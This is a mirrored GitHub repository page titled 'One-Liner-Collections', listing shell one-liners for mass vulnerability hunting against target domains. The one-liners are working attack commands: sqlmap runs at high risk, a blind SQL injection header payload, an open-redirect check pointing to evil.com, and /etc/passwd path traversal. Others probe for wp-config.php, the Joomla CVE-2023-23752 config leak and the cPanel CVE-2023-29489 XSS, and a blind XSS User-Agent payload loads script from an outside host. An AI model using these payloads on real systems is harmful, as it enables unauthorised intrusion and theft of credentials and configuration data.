thecybertix/One-Liner-Collections thecybertix/One-Liner-Collections

  • Stars
    star
    384
  • Rank 111,282 (Top 3 %)
  • Language
  • Created over 1 year ago
  • Updated 5 months ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
thecybertix/One-Liner-Collections
github

thecybertix

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

This Repositories contains list of One Liners with Descriptions and Installation requirements

One-Liner-Collections

This Repositories contains list of One Liners with Descriptions and Installation requirements

────────────────────────────────────────────────────────────────────────

SQL Injection

Installation Requirements

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. GAU : https://github.com/lc/gau
  3. GF : https://github.com/tomnomnom/gf
  4. Findomain : https://github.com/Findomain/Findomain
  5. HTTPX : https://github.com/projectdiscovery/httpx
  6. Anew : https://github.com/tomnomnom/anew
  7. Waybackurls : https://github.com/tomnomnom/waybackurls

OneLiner

subfinder -d http://TARGET.com -silent -all | gau - blacklist ttf,woff,svg,png | sort -u | gf sqli >gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli_report.txt

findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1

cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI by Cybertix\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection\e[0m" ;done

Header-Based Blind SQL injection

cat domain.txt | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13'

────────────────────────────────────────────────────────────────────────

Open Redirection

Installation Requirements

  1. Waybackurls : https://github.com/tomnomnom/waybackurls
  2. Bhedak : https://github.com/R0X4R/bhedak
  3. GAU : https://github.com/lc/gau
  4. GF : https://github.com/tomnomnom/gf
  5. QS-Replace : https://github.com/tomnomnom/qsreplace
  6. HTTPX : https://github.com/projectdiscovery/httpx
  7. Subfinder : https://github.com/projectdiscovery/subfinder
  8. Httprobe : https://github.com/tomnomnom/httprobe
  9. Nuclei : https://github.com/projectdiscovery/nuclei

OneLiner

waybackurls TARGET.COM | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I| grep "evil.com" && echo "$host \033[0;31mVulnerable\n" ;done

subfinder -dL domains.txt | httprobe |tee live_domain.txt; cat live_domain.txt | waybackurls | tee wayback.txt; cat wayback.txt | sort -u | grep "\?" > open.txt; nuclei -t Url-Redirection-Catcher.yaml -l open.txt

────────────────────────────────────────────────────────────────────────

NGINX Path Traversal

Installation Requirements

  1. HTTPX : https://github.com/projectdiscovery/httpx

OneLiner

httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'

────────────────────────────────────────────────────────────────────────

Subdomain Takeover

Installation Requirements

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. Assetfinder : https://github.com/tomnomnom/assetfinder
  3. Amass : https://github.com/OWASP/Amass
  4. Subjack : https://github.com/haccer/subjack

OneLiner

subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/cybertix/subjack/fingerprints.json -v 3 >> takeover ;

────────────────────────────────────────────────────────────────────────

Extract URLs from Source Code

OneLiner

curl "https://TARGET.Com" | grep -oP '(https*.//|www\.)[^]*'

────────────────────────────────────────────────────────────────────────

XSS (Cross-Site Scripting)

Installation Requirements

  1. Katana : https://github.com/projectdiscovery/katana
  2. Dalfox : https://github.com/hahwul/dalfox
  3. Waybackurls : https://github.com/tomnomnom/waybackurls
  4. GF : https://github.com/tomnomnom/gf
  5. Dalfox : https://github.com/hahwul/dalfox
  6. HTTPX : https://github.com/projectdiscovery/httpx

OneLiner

echo http://testphp.vulnweb.com | katana -jc -f qurl -d 5 -c 50 -kf robotstxt,sitemapxml -silent | dalfox pipe --skip-bav

waybackurls http://testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee XSS.txt && cat XSS.txt | dalfox -b http://chirag.bxss.in pipe > output.txt

Blind XSS Mass Hunting

cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://chirag.bxss.in></script>"

────────────────────────────────────────────────────────────────────────

Find Endpoints in JS

Installation Requirements

  1. Katana : https://github.com/projectdiscovery/katana
  2. Anew : https://github.com/tomnomnom/anew

OneLiner

katana -u http://testphp.vulnweb.com -js-crawl -d 5 -hl -filed endpoint | anew endpoint.txt

────────────────────────────────────────────────────────────────────────

OneLiner for CVE-2023-23752 - 𝙅𝙤𝙤𝙢𝙡𝙖 𝙄𝙢𝙥𝙧𝙤𝙥𝙚𝙧 𝘼𝙘𝙘𝙚𝙨𝙨 𝙘𝙝𝙚𝙘𝙠 𝙞𝙣 𝙒𝙚𝙗𝙨𝙚𝙧𝙫𝙞𝙘𝙚 𝙀𝙣𝙙𝙥𝙤𝙞𝙣𝙩

Installation Requirements

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

OneLiner

subfinder -d http://TARGET.COM -silent -all | httpx -silent -path 'api/index.php/v1/config/application?public=true' -mc 200

────────────────────────────────────────────────────────────────────────

cPanel CVE-2023-29489 XSS One-Liner

Installation Requirements

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

OneLiner

subfinder -d http://example.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path '/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaaaaa' -mc 400

────────────────────────────────────────────────────────────────────────

WP-Config Oneliner

Installation Requirements

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

OneLiner

subfinder -silent -d TARGET.com | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60 -status-code

────────────────────────────────────────────────────────────────────────

JS Secret Finder Oneliner

Installation Requirements

  1. Gau : https://github.com/lc/gau
  2. HTTPX : https://github.com/projectdiscovery/httpx
  3. Nuclei : https://github.com/projectdiscovery/nuclei

OneLiner

echo TARGET.com | gau | grep ".js" | httpx -content-type | grep 'application/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt

────────────────────────────────────────────────────────────────────────

Memory dump and env disclosure

Installation Requirements

  1. Shodan : https://www.shodan.io

OneLiner

shodan search org: "Target" http.favicon.hash:116323821 --fields ip_str,port--separator | awk '{print $1 $2}'

────────────────────────────────────────────────────────────────────────

Easiest Information Disclosure in JSON body

Installation Requirements

  1. Waybackurls : https://github.com/tomnomnom/waybackurls
  2. HTTPX : https://github.com/projectdiscovery/httpx

OneLiner

cat subdomains.txt | waybackurls | httpx -mc 200 -ct | grep application/json

More Repositories

1

CyberXS

CyberXS is an XSS Vulnerability Automation Tool made with multiple Oneliners
Shell
3
star
2

Regex

The Repository will contains all the Regex which will helpful for Penetration Testing.
1
star
3

LottaPixel

Download the LottaPixel Image and upload it to perform Memory Corruption
1
star